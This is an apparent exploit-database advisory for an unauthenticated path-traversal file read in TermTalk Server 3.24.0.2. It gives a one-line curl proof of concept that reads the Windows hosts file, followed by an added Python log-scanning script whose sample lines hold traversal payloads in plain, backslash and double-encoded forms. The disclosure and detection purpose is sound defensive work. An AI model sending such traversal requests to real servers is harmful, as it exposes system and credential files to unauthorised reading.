TermTalk Server 3.24.0.2 Arbitrary File Read

2022.01.05
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/

POC

curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts
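For defenders reviewing web logs from a server that has not yet been upgraded to 3.26.1.7, the following added example (not part of the original advisory) flags requests to the `/file` endpoint whose `valore` parameter resolves to a traversal path after decoding. The access-log format and the sample lines are constructed assumptions; adapt the regex to the log format actually in use.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in common log format (assumed; not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jan/2022:10:01:12 +0100] "GET /file?valore=../../../../WINDOWS/System32/drivers/etc/hosts HTTP/1.1" 200 824
198.51.100.7 - - [05/Jan/2022:10:01:15 +0100] "GET /file?valore=..%5c..%5c..%5c..%5cWINDOWS%5cSystem32%5cdrivers%5cetc%5chosts HTTP/1.1" 200 824
198.51.100.7 - - [05/Jan/2022:10:01:19 +0100] "GET /file?valore=%252e%252e%252f%252e%252e%252fWINDOWS/System32/drivers/etc/hosts HTTP/1.1" 404 0
203.0.113.20 - - [05/Jan/2022:10:02:40 +0100] "GET /file?valore=logo.png HTTP/1.1" 200 5120
203.0.113.20 - - [05/Jan/2022:10:02:44 +0100] "GET /index.html HTTP/1.1" 200 1033
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded sequences are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value has a '..' segment or is an absolute/drive path."""
    path = fully_decode(value).replace("\\", "/")
    return (".." in path.split("/") or path.startswith("/")
            or re.match(r"[A-Za-z]:", path) is not None)

def find_traversal_requests(log_text):
    """Return (client_ip, http_status, decoded_value) for suspicious /file requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != "/file":
            continue
        # parse_qs already decodes once; fully_decode handles further layers.
        for value in parse_qs(url.query, keep_blank_values=True).get("valore", []):
            if is_traversal(value):
                hits.append((line.split()[0], int(m.group(2)), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for ip, status, value in find_traversal_requests(SAMPLE_LOG):
        # A 200 status on a flagged request suggests the file was actually returned.
        print(f"{ip} status={status} valore={value}")
```

Flagged requests that returned status 200 are the ones to prioritise when assessing what was disclosed.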



Copyright 2022, cxsecurity.com